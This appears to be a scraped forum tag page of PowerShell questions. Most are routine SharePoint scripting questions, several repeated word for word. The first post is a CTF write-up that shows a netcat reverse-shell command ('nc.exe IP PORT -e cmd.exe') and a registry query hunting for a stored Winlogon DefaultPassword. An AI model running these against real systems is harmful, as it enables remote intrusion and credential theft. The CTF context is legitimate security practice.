Tag: Powershell

Powershell (WinRM) and cmd.exe: reg query output deviation

during a CTF I encountered the following anomaly regarding PS & cmd.exe:

  • I got access to a Windows x86 server through WinRM Port 5985 using evil-winrm. (https://github.com/Hackplayers/evil-winrm) This spawns a PS shell.
  • Via the PS shell I transferred nc.exe to the machine and used cmd.exe /c “nc.exe IP PORT -e cmd.exe” to spawn an additional regular cmd.exe shell back to me.

I searched the registry for stored passwords using the following command: reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”

This is where I noticed that the PS shell reg query returns considerable more output than the cmd.exe reg query. PS includes the “DefaultPassword” entry, whereas cmd.exe does not include this value.

The full output deviation is captured in the following screenshot: req query on powershell shows more entries than req query on cmd.exe The same behavior is observable for other registry items. PS generally returns more elements than the cmd.exe “sub-shell”.

Any hints to why this behavior occurs are greatly appreciated.

Powershell script to get workflow tasks for each list item

I have a lot of number of webs (sub-sites) within a site collection that have lists that have list items with Approval workflows running on them.

How would I get all tasks for each list item in powershell? I see that the “tasks” list has the ‘Related Content’ column which has the title of the list item. How to I do a union between the two lists (the task list and the item list) in powershell?

Thanks for your help!

Powershell script to get workflow tasks for each list item

I have a lot of number of webs (sub-sites) within a site collection that have lists that have list items with Approval workflows running on them.

How would I get all tasks for each list item in powershell? I see that the “tasks” list has the ‘Related Content’ column which has the title of the list item. How to I do a union between the two lists (the task list and the item list) in powershell?

Thanks for your help!

Powershell: Is there a way to extract the Identity from a WSP file?

I want to automatically add and install some wsp files. To check if the file is already installed I (think I) need the identity of the solution that I am about to deploy. How can I extract the Identity of the solution out of the WSP file?

foreach ($  wspFIL in $  solutionsARY) {     $  fileNameSTR = $  filesDIR + $  wspFIL     $  identitySTR = getIdentityFromWsp fileNameSTR#... this is what I need      Add-SPSolution -LiteralPath  $  fileNameSTR     Install-SPSolution -Identity  $  identitySTR }

Archive or move List Items with Version History and Attachments using PowerShell

I have a large list that I need to archive list items off to a different list within the same site. (I’ll make the list into a template to make the archive lists.) The list is an InfoPath list that has attachments and has version history enabled. Can PowerShell move the list items from the main list to the other and keep the attachments and version history? I’m also still quite new to PowerShell so I wanted to get some insight from others who have more experience with this sort of thing.

Also I’m using SharePoint 2013 On Prem.

  1. I simply want to know if this is even possible.

  2. I’ve started my script and was able to get my list and filter the content I want to move, I just am unsure how to tackle moving the items and keeping the version history and attachments for the list items that are moved.

Here is what I have so far: 

Add-PSSnapin Microsoft.SharePoint.PowerShell -ErrorAction SilentlyContinue Function global:Get-SPWeb($  url)  {   $  site= New-Object Microsoft.SharePoint.SPSite($  url)         if($  site -ne $  null)             {                $  web=$  site.OpenWeb();                      }     return $  web }  #Get the web and List  $  Web = Get-SPWeb "https://ExampleSite.com/SiteOne"  $  SourceList = $  web.Lists["List 1"]  $  TargetList = $  Web.Lists["List 2"]   #Get all items Created before target date    $  Query = New-Object Microsoft.SharePoint.SPQuery $  Query.Query = "@ <Where>     <Eq>         <FieldRef Name='Status' />         <Value Type='Choice'>Complete</Value>     </Eq> </Where>"  #Get List Items matching the query  $  ListItems = $  SourceList.GetItems($  Query)  Write-host "Total Number of Items: "$  ListItems.count

Archive or move List Items with Version History and Attachments using PowerShell

I have a large list that I need to archive list items off to a different list within the same site. (I’ll make the list into a template to make the archive lists.) The list is an InfoPath list that has attachments and has version history enabled. Can PowerShell move the list items from the main list to the other and keep the attachments and version history? I’m also still quite new to PowerShell so I wanted to get some insight from others who have more experience with this sort of thing.

Also I’m using SharePoint 2013 On Prem.

  1. I simply want to know if this is even possible.

  2. I’ve started my script and was able to get my list and filter the content I want to move, I just am unsure how to tackle moving the items and keeping the version history and attachments for the list items that are moved.

Here is what I have so far: 

Add-PSSnapin Microsoft.SharePoint.PowerShell -ErrorAction SilentlyContinue Function global:Get-SPWeb($  url)  {   $  site= New-Object Microsoft.SharePoint.SPSite($  url)         if($  site -ne $  null)             {                $  web=$  site.OpenWeb();                      }     return $  web }  #Get the web and List  $  Web = Get-SPWeb "https://ExampleSite.com/SiteOne"  $  SourceList = $  web.Lists["List 1"]  $  TargetList = $  Web.Lists["List 2"]   #Get all items Created before target date    $  Query = New-Object Microsoft.SharePoint.SPQuery $  Query.Query = "@ <Where>     <Eq>         <FieldRef Name='Status' />         <Value Type='Choice'>Complete</Value>     </Eq> </Where>"  #Get List Items matching the query  $  ListItems = $  SourceList.GetItems($  Query)  Write-host "Total Number of Items: "$  ListItems.count

Pnp PowerShell Get-PnpFolder gives error on Method “GetFolderByServerRelativePath”

I’m using Sharepoint Pnp PowerShell against a SharePoint 2013 server on-prem and whenever I try to use Get-PnpFolder, it gives the error:

Method “GetFolderByServerRelativePath” does not exist

The Rename-PnpFolder also gives the same error.

I’ve tried using it on both my workstation (Windows 10) and on one of the SharePoint 2013 Server web front ends. Both get the same error. All the other cmdlets I have used work just fine.

It is connecting to the site because I can use the cmdlets to access lists for example.

The docs don’t seem to indicate that this shouldn’t work with 2013. Any ideas?

Query SharePoint listdata.svc with Powershell

I’m running SharePoint 2010 and I have a requirement to be able to query SharePoint from Powershell without having the SharePoint snap-in. I have been experimenting with some code that I found but I’m having trouble filtering the list items. The script below always displays all the items in the output when I’m expecting one item. What’s the best way to filter list items?

$  url = "https://mysite/market/_vti_bin/listdata.svc/Products?$  filter=Title eq 'Movies'"  $  request = [System.Net.WebRequest]::Create($  url)  $  request.UseDefaultCredentials = $  true  $  request.Accept = ‘application/json;odata=verbose’  $  response = $  request.GetResponse()  $  reader = New-Object System.IO.StreamReader $  response.GetResponseStream()  # ConvertFrom-Json : Cannot convert the Json string because a dictionary converted from it contains duplicated keys ‘Id’ and ‘ID’.  $  response = $  reader.ReadToEnd()  #$  response = $  reader.ReadToEnd() -creplace ‘"ID":’, ‘"DummyId":’  $  result = ConvertFrom-Json -InputObject $  response  $  result.d.results | select Id, Title

Query SharePoint listdata.svc with Powershell

I’m running SharePoint 2010 and I have a requirement to be able to query SharePoint from Powershell without having the SharePoint snap-in. I have been experimenting with some code that I found but I’m having trouble filtering the list items. The script below always displays all the items in the output when I’m expecting one item. What’s the best way to filter list items?

$  url = "https://mysite/market/_vti_bin/listdata.svc/Products?$  filter=Title eq 'Movies'"  $  request = [System.Net.WebRequest]::Create($  url)  $  request.UseDefaultCredentials = $  true  $  request.Accept = ‘application/json;odata=verbose’  $  response = $  request.GetResponse()  $  reader = New-Object System.IO.StreamReader $  response.GetResponseStream()  # ConvertFrom-Json : Cannot convert the Json string because a dictionary converted from it contains duplicated keys ‘Id’ and ‘ID’.  $  response = $  reader.ReadToEnd()  #$  response = $  reader.ReadToEnd() -creplace ‘"ID":’, ‘"DummyId":’  $  result = ConvertFrom-Json -InputObject $  response  $  result.d.results | select Id, Title

Query SharePoint listdata.svc with Powershell

I’m running SharePoint 2010 and I have a requirement to be able to query SharePoint from Powershell without having the SharePoint snap-in. I have been experimenting with some code that I found but I’m having trouble filtering the list items. The script below always displays all the items in the output when I’m expecting one item. What’s the best way to filter list items?

$  url = "https://mysite/market/_vti_bin/listdata.svc/Products?$  filter=Title eq 'Movies'"  $  request = [System.Net.WebRequest]::Create($  url)  $  request.UseDefaultCredentials = $  true  $  request.Accept = ‘application/json;odata=verbose’  $  response = $  request.GetResponse()  $  reader = New-Object System.IO.StreamReader $  response.GetResponseStream()  # ConvertFrom-Json : Cannot convert the Json string because a dictionary converted from it contains duplicated keys ‘Id’ and ‘ID’.  $  response = $  reader.ReadToEnd()  #$  response = $  reader.ReadToEnd() -creplace ‘"ID":’, ‘"DummyId":’  $  result = ConvertFrom-Json -InputObject $  response  $  result.d.results | select Id, Title